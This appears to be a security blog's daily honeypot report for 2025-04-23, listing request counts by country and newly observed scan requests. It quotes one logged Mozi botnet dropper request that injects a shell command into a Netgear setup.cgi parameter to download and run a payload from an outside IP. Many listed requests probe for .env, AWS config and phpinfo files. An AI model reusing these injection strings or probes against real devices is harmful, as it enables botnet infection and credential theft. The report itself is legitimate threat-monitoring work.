Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-04-23

·512 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-23
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 46 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1674 requests were recorded during the day, originating from 1 different countries, with a peak of 431 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
GBGeorgia
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
84.53.198.174GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://84.53.198.174:55691/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
254POST /all HTTP/1.1
1961GET //webpages/login.html HTTP/1.1
2031POST /api/user/binLookup?time=1745369171337875278 HTTP/1.1
2041GET /api/bin/440393?time=1745369170835361078 HTTP/1.1
2391POST /api/user/binLookup?time=1745368665861767786 HTTP/1.1
2401GET /api/bin/440393?time=1745368665457778723 HTTP/1.1
2411GET /config/index?time=1745367532087813904 HTTP/1.1
2471GET /XVhG HTTP/1.1
2481GET /ZYp9 HTTP/1.1
2751GET /FwPP HTTP/1.1
2761GET /UUeM HTTP/1.1
2821POST /mgmt/tm/util/bash HTTP/1.1
3061GET /api2/.env HTTP/1.1
3121GET /core/Database/.env HTTP/1.1
3201GET /.env.py HTTP/1.1
3371GET /docker-compose/.env HTTP/1.1
3381GET /database/backup/.env HTTP/1.1
3421GET /api/system/.env HTTP/1.1
3441GET /administrator/config/.env HTTP/1.1
3451GET /admin/backup/.env HTTP/1.1
3461GET /admin/db/.env HTTP/1.1
3491POST /aws.yml HTTP/1.1
3521POST /_profiler/phpinfo HTTP/1.1
3551POST /%C0 HTTP/1.1
3601GET /setting/.env HTTP/1.1
3671POST /info.php HTTP/1.1
3681POST /frontend_dev.php HTTP/1.1
3691POST /frontend/web/debug/default/view HTTP/1.1
3721POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1
3731POST /debug/default/view?panel=config HTTP/1.1
3741POST /debug/default/view.html HTTP/1.1
3751POST /debug/default/view HTTP/1.1
3761POST /config/aws.yml HTTP/1.1
3771POST /config.js HTTP/1.1
3811POST /symfony/public HTTP/1.1
3831POST /sapi/debug/default/view HTTP/1.1
3891POST /phpinfo.php HTTP/1.1
3901POST /phpinfo HTTP/1.1
3971GET /api/bin/440393?time=1745368639584839159 HTTP/1.1
3981GET /config/index?time=1745367509457219171 HTTP/1.1
4061POST /wp-config.php-backup HTTP/1.1
4071POST /web/debug/default/view HTTP/1.1
4111POST /tool/view/phpinfo.view.php HTTP/1.1
4121POST /symfony/public/_profiler/phpinfo HTTP/1.1
4281POST /api/user/binLookup?time=1745368640010425730 HTTP/1.1
5411GET /config/index?time=1745368057477993246 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0431US
1429GB
2142NL
3124SC
4110PL
596DE
679HK
771CN
833CA
916TW
1015JP
1114FR
1214IN
1312UA
1412KR
157AU
166PT
176MY
186BE
195ZA
204SG
214VE
224IT
234AO
243TR
253RO
263BR
273ID
283RU
292IL
302MC
312VN
322TH
331NP
341ES
351BG
361EE
371IR
381SK
391SE

Related

Report: 2025-04-22
·410 words
Repport Daily
Report: 2025-04-21
·30388 words
Repport Daily
Report: 2025-04-20
·504 words
Repport Daily